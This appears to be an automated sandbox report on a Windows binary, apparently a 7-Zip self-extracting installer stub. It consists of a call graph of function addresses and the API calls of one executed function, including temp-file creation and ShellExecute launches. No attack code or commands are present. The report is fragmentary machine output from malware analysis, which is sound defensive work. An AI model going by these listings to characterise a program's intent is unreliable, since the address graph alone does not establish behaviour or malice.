9714 40486c 9713->9714 9715 404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9262 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9262 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9264 9740 408646 9739->9740 9752 4083d5 9739->9752 9740->9270 9741 40243b lstrcmpW 9741->9752 9742 40661a 2 API calls 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 407776 55 API calls 9749->9752 9750 403f48 4 API calls 9750->9752 9751 4073d1 21 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9766 408333 9761->9766 10521 4019f0 GetStdHandle WriteFile 9761->10521 9765 40243b lstrcmpW 9768 408351 9765->9768 9767 408344 9766->9767 10522 4019f0 GetStdHandle WriteFile 9766->10522 9767->9765 9769 40835f 9768->9769 10523 4019f0 GetStdHandle WriteFile 9768->10523 9771 40243b lstrcmpW 9769->9771 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9310 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9310 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9807 403fcf 9802->9807 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9807 9806 402535 2 API calls 9808 403ff2 wsprintfW 9806->9808 9807->9806 9809 404009 GetFileAttributesW 9807->9809 9810 40402d 9807->9810 9808->9807 9809->9807 9809->9810 9810->9295 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9338 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022ea 9901->9902 9903 4022be ??2@YAPAXI 9901->9903 9902->9453 9903->9902 9904 4022cf ??3@YAXPAX 9903->9904 9904->9902 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9921 40437e 9920->9921 9923 4022b0 2 API calls 9921->9923 9925 404387 9923->9925 9924 404373 9928 403ec1 9924->9928 9926 4025f6 2 API calls 9925->9926 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9924 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9924 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 4025ae 2 API calls 9946->9947 9948 402992 9947->9948 9949 4029be 9948->9949 9950 402640 2 API calls 9948->9950 9949->9536 9950->9948 9954 4023e8 9951->9954 9952 4023f4 lstrcmpW 9953 402411 9952->9953 9952->9954 9953->9536 9954->9952 9954->9953 9955->9536 9957 4029d2 9956->9957 9958 4029de 9956->9958 9975 4019f0 GetStdHandle WriteFile 9957->9975 9960 4025ae 2 API calls 9958->9960 9964 4029e8 9960->9964 9961 4029d9 9973 402425 ??3@YAXPAX ??3@YAXPAX 9961->9973 9962 402a13 9963 40272e 3 API calls 9962->9963 9965 402a25 9963->9965 9964->9962 9968 402640 2 API calls 9964->9968 9966 402a33 9965->9966 9967 402a47 9965->9967 9969 407776 55 API calls 9966->9969 9970 407776 55 API calls 9967->9970 9968->9964 9971 402a42 ??3@YAXPAX ??3@YAXPAX 9969->9971 9970->9971 9971->9961 9973->9533 9974->9522 9975->9961 9977 403d3d 9976->9977 9988 403c63 9977->9988 9981 403cd3 9980->9981 9982 403c63 _wtol 9981->9982 9983 403cf4 9982->9983 9983->9588 9985 403d04 9984->9985 9986 403c63 _wtol 9985->9986 9987 403d1c 9986->9987 9987->9593 9989 403c6d 9988->9989 9990 403c88 _wtol 9989->9990 9991 403cc1 9989->9991 9990->9989 9991->9582 9993 408679 9992->9993 9993->9630 9995 40a7fe 9994->9995 9996 40b2fc 11 API calls 9995->9996 9997 40a823 9996->9997 9998 40a845 9997->9998 9999 40a82c 9997->9999 10040 40cc59 _EH_prolog 9998->10040 10043 40a3fe 9999->10043 10011 40b30d 10010->10011 10015 40dcfb 3 API calls 10011->10015 10012 40b321 10013 40b331 10012->10013 10479 40b163 10012->10479 10013->9633 10015->10012 10017 40151e 10016->10017 10018 401329 2 API calls 10017->10018 10019 40152b 10018->10019 10020 401429 2 API calls 10019->10020 10021 401534 CreateThread 10020->10021 10022 401563 10021->10022 10023 401568 WaitForSingleObject 10021->10023 10492 40129c 10021->10492 10024 40786b 23 API calls 10022->10024 10025 401585 10023->10025 10026 4015b7 10023->10026 10024->10023 10029 4015a3 10025->10029 10032 401594 10025->10032 10027 4015b3 10026->10027 10028 4015bf GetExitCodeThread 10026->10028 10027->9640 10030 4015d6 10028->10030 10031 407776 55 API calls 10029->10031 10030->10027 10030->10032 10033 401605 SetLastError 10030->10033 10031->10027 10032->10027 10034 407776 55 API calls 10032->10034 10033->10032 10034->10027 10036 401411 2 API calls 10035->10036 10037 4042ab 10036->10037 10038 401411 2 API calls 10037->10038 10039 4042b7 10038->10039 10039->9639 10051 40c9fc 10040->10051 10462 40a28e 10043->10462 10073 40a0bf 10051->10073 10207 40a030 10073->10207 10208 40e8da 3 API calls 10207->10208 10209 40a039 10208->10209 10210 40e8da 3 API calls 10209->10210 10211 40a041 10210->10211 10212 40e8da 3 API calls 10211->10212 10213 40a049 10212->10213 10214 40e8da 3 API calls 10213->10214 10215 40a051 10214->10215 10216 40e8da 3 API calls 10215->10216 10217 40a059 10216->10217 10218 40e8da 3 API calls 10217->10218 10219 40a061 10218->10219 10220 40e8da 3 API calls 10219->10220 10221 40a06b 10220->10221 10222 40e8da 3 API calls 10221->10222 10223 40a073 10222->10223 10224 40e8da 3 API calls 10223->10224 10225 40a080 10224->10225 10226 40e8da 3 API calls 10225->10226 10227 40a088 10226->10227 10228 40e8da 3 API calls 10227->10228 10229 40a095 10228->10229 10230 40e8da 3 API calls 10229->10230 10231 40a09d 10230->10231 10232 40e8da 3 API calls 10231->10232 10233 40a0aa 10232->10233 10234 40e8da 3 API calls 10233->10234 10235 40a0b2 10234->10235 10463 40e8da 3 API calls 10462->10463 10464 40a29c 10463->10464 10480 40f0b6 GetLastError 10479->10480 10482 40b17e 10480->10482 10481 40b192 10481->10013 10482->10481 10483 40adc3 3 API calls 10482->10483 10484 40b1b6 memcpy 10483->10484 10489 40b1d9 10484->10489 10485 40b297 ??3@YAXPAX 10485->10481 10486 40b2a2 ??3@YAXPAX 10486->10481 10488 40b27a memmove 10488->10489 10489->10485 10489->10486 10489->10488 10490 40b2ac memcpy 10489->10490 10491 40dcfb 3 API calls 10490->10491 10491->10486 10493 4012a5 10492->10493 10494 4012b8 10492->10494 10493->10494 10495 4012a7 Sleep 10493->10495 10496 4012f1 10494->10496 10497 4012e3 EndDialog 10494->10497 10495->10493 10497->10496 10499 4021db 10498->10499 10499->9651 10501 4012f7 2 API calls 10500->10501 10502 402676 10501->10502 10503 4012f7 2 API calls 10502->10503 10504 402682 10503->10504 10504->9704 10506 4025ae 2 API calls 10505->10506 10507 402785 10506->10507 10508 4027c1 10507->10508 10511 402628 10507->10511 10508->9731 10512 402634 10511->10512 10513 40263a WideCharToMultiByte 10511->10513 10514 4022b0 2 API calls 10512->10514 10513->10508 10514->10513 10516 407456 10515->10516 10517 40745b 10515->10517 10516->9752 10517->10516 10518 4073d1 21 API calls 10517->10518 10518->10516 10519->9759 10520->9761 10521->9766 10522->9767 10523->9769 10524->9773 10525->9777 10526->9781 10528 40661a 2 API calls 10527->10528 10529 40715c 10528->10529 10529->9789 10533 40716d 10530->10533 10534 40661a 2 API calls 10533->10534 10535 407175 10534->10535 10535->9789 10537 40661a 2 API calls 10536->10537 10538 4071a7 10537->10538 10538->9815 8037 40f3f1 8040 4024e7 8037->8040 8045 40245a 8040->8045 8043 4024f5 8044 4024f6 malloc 8046 40246a 8045->8046 8052 402466 8045->8052 8047 40247a GlobalMemoryStatusEx 8046->8047 8046->8052 8048 402488 8047->8048 8047->8052 8048->8052 8053 401f9d 8048->8053 8052->8043 8052->8044 8057 401fb4 8053->8057 8054 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8055 402095 SetLastError 8054->8055 8056 40201d ??2@YAPAXI GetEnvironmentVariableW 8054->8056 8060 401fdb 8055->8060 8061 4020ac 8055->8061 8058 40207e ??3@YAXPAX 8056->8058 8059 40204c GetLastError 8056->8059 8057->8054 8057->8060 8067 402081 8058->8067 8059->8058 8062 402052 8059->8062 8073 407717 8060->8073 8064 4020cb lstrlenA ??2@YAPAXI 8061->8064 8080 401f47 8061->8080 8062->8067 8068 40205c lstrcmpiW 8062->8068 8065 402136 MultiByteToWideChar 8064->8065 8066 4020fc GetLocaleInfoW 8064->8066 8065->8060 8066->8065 8071 402123 _wtol 8066->8071 8067->8055 8068->8058 8072 40206b ??3@YAXPAX 8068->8072 8070 4020c1 8070->8064 8071->8065 8072->8067 8087 40661a 8073->8087 8076 40774e 8091 4073d1 8076->8091 8077 40773c IsBadReadPtr 8077->8076 8081 401f51 GetUserDefaultUILanguage 8080->8081 8082 401f95 8080->8082 8083 401f72 GetSystemDefaultUILanguage 8081->8083 8084 401f6e 8081->8084 8082->8070 8083->8082 8085 401f7e GetSystemDefaultLCID 8083->8085 8084->8070 8085->8082 8086 401f8e 8085->8086 8086->8082 8088 406643 8087->8088 8089 40666f IsWindow 8087->8089 8088->8089 8090 40664b GetSystemMetrics GetSystemMetrics 8088->8090 8089->8076 8089->8077 8090->8089 8092 4073e0 8091->8092 8093 407444 8091->8093 8092->8093 8103 4024fc 8092->8103 8093->8052 8095 4073f1 8096 4024fc 2 API calls 8095->8096 8097 4073fc 8096->8097 8107 403b7f 8097->8107 8100 403b7f 19 API calls 8101 40740e ??3@YAXPAX ??3@YAXPAX 8100->8101 8101->8093 8104 402513 8103->8104 8116 40112b 8104->8116 8106 40251e 8106->8095 8180 403880 8107->8180 8109 403b59 8121 40393b 8109->8121 8111 403b69 8144 4039f6 8111->8144 8113 403b74 8167 4027c7 8113->8167 8117 401177 8116->8117 8118 401139 ??2@YAPAXI 8116->8118 8117->8106 8118->8117 8120 40115a 8118->8120 8119 40116f ??3@YAXPAX 8119->8117 8120->8119 8120->8120 8203 401411 8121->8203 8125 403954 8210 40254d 8125->8210 8127 403961 8128 4024fc 2 API calls 8127->8128 8129 40396e 8128->8129 8214 403805 8129->8214 8132 401362 2 API calls 8133 403992 8132->8133 8134 40254d 2 API calls 8133->8134 8135 40399f 8134->8135 8136 4024fc 2 API calls 8135->8136 8137 4039ac 8136->8137 8138 403805 3 API calls 8137->8138 8139 4039bc ??3@YAXPAX 8138->8139 8140 4024fc 2 API calls 8139->8140 8141 4039d3 8140->8141 8142 403805 3 API calls 8141->8142 8143 4039e2 ??3@YAXPAX ??3@YAXPAX 8142->8143 8143->8111 8145 401411 2 API calls 8144->8145 8146 403a04 8145->8146 8147 401362 2 API calls 8146->8147 8148 403a0f 8147->8148 8149 40254d 2 API calls 8148->8149 8150 403a1c 8149->8150 8151 4024fc 2 API calls 8150->8151 8152 403a29 8151->8152 8153 403805 3 API calls 8152->8153 8154 403a39 ??3@YAXPAX 8153->8154 8155 401362 2 API calls 8154->8155 8156 403a4d 8155->8156 8157 40254d 2 API calls 8156->8157 8158 403a5a 8157->8158 8159 4024fc 2 API calls 8158->8159 8160 403a67 8159->8160 8161 403805 3 API calls 8160->8161 8162 403a77 ??3@YAXPAX 8161->8162 8163 4024fc 2 API calls 8162->8163 8164 403a8e 8163->8164 8165 403805 3 API calls 8164->8165 8166 403a9d ??3@YAXPAX ??3@YAXPAX 8165->8166 8166->8113 8168 401411 2 API calls 8167->8168 8169 4027d5 8168->8169 8170 4027e5 ExpandEnvironmentStringsW 8169->8170 8171 40112b 2 API calls 8169->8171 8172 402809 8170->8172 8173 4027fe ??3@YAXPAX 8170->8173 8171->8170 8239 402535 8172->8239 8174 402840 8173->8174 8174->8100 8177 402824 8178 401362 2 API calls 8177->8178 8179 402838 ??3@YAXPAX 8178->8179 8179->8174 8181 401411 2 API calls 8180->8181 8182 40388e 8181->8182 8183 401362 2 API calls 8182->8183 8184 403899 8183->8184 8185 40254d 2 API calls 8184->8185 8186 4038a6 8185->8186 8187 4024fc 2 API calls 8186->8187 8188 4038b3 8187->8188 8189 403805 3 API calls 8188->8189 8190 4038c3 ??3@YAXPAX 8189->8190 8191 401362 2 API calls 8190->8191 8192 4038d7 8191->8192 8193 40254d 2 API calls 8192->8193 8194 4038e4 8193->8194 8195 4024fc 2 API calls 8194->8195 8196 4038f1 8195->8196 8197 403805 3 API calls 8196->8197 8198 403901 ??3@YAXPAX 8197->8198 8199 4024fc 2 API calls 8198->8199 8200 403918 8199->8200 8201 403805 3 API calls 8200->8201 8202 403927 ??3@YAXPAX ??3@YAXPAX 8201->8202 8202->8109 8204 40112b 2 API calls 8203->8204 8205 401425 8204->8205 8206 401362 8205->8206 8207 40136e 8206->8207 8209 401380 8206->8209 8208 40112b 2 API calls 8207->8208 8208->8209 8209->8125 8211 40255a 8210->8211 8219 401398 8211->8219 8213 402565 8213->8127 8215 40381b 8214->8215 8216 403817 ??3@YAXPAX 8214->8216 8215->8216 8223 4026b1 8215->8223 8227 402f96 8215->8227 8216->8132 8220 4013dc 8219->8220 8221 4013ac 8219->8221 8220->8213 8222 40112b 2 API calls 8221->8222 8222->8220 8224 4026c7 8223->8224 8225 4026db 8224->8225 8231 402346 memmove 8224->8231 8225->8215 8228 402fa5 8227->8228 8230 402fbe 8228->8230 8232 4026e6 8228->8232 8230->8215 8231->8225 8233 4026f6 8232->8233 8234 401398 2 API calls 8233->8234 8235 402702 8234->8235 8238 402346 memmove 8235->8238 8237 40270f 8237->8230 8238->8237 8240 402541 8239->8240 8241 402547 ExpandEnvironmentStringsW 8239->8241 8242 40112b 2 API calls 8240->8242 8241->8177 8242->8241 11204 40e4f9 11205 40e516 11204->11205 11206 40e506 11204->11206 11209 40de46 11206->11209 11212 401b1f VirtualFree 11209->11212 11211 40de81 ??3@YAXPAX 11211->11205 11212->11211

                                                            Executed Functions

                                                            Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                              • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                              • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                              • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                              • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                              • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                              • Part of subcall function 00401B37: DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                            • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                            • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                              • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                              • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                            • _wtol.MSVCRT ref: 0040509F
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                            • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                            • _wtol.MSVCRT ref: 00405217
                                                            • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                              • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                              • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                              • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                              • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                              • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                              • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                              • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                              • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                              • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                              • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                              • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                              • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                            • wsprintfW.USER32 ref: 00405595
                                                            • _wtol.MSVCRT ref: 004057DE
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                            • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                            • CoInitialize.OLE32(00000000), ref: 004059E9
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                            • GetKeyState.USER32(00000010), ref: 00405AA1
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                            • memset.MSVCRT ref: 004060AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                            • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
